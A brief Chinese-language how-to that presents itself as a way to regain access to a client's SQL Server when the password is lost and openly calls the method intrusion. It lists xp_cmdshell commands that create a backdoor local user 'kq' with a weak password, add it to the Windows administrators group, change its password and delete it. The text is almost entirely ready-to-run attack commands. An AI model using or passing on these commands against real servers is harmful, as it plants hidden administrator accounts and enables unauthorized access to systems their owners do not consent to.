解决问题: 客户数据库服务器,因遗失密码 而无法进入时,可考虑通过该方法进行入侵.
1.添加用户 kq 密码 123 为后门.
EXEC master..xp_cmdshell 'net user kq 123 /add'
2.将用户 kq 添加到系统管理员组中.
EXEC master..xp_cmdshell 'net localgroup administrators kq /add'
3.删除用户 kq
EXEC master..xp_cmdshell 'net user kq /delete'
4.修改用户密码(123456)
EXEC master..xp_cmdshell 'net user kq 123456'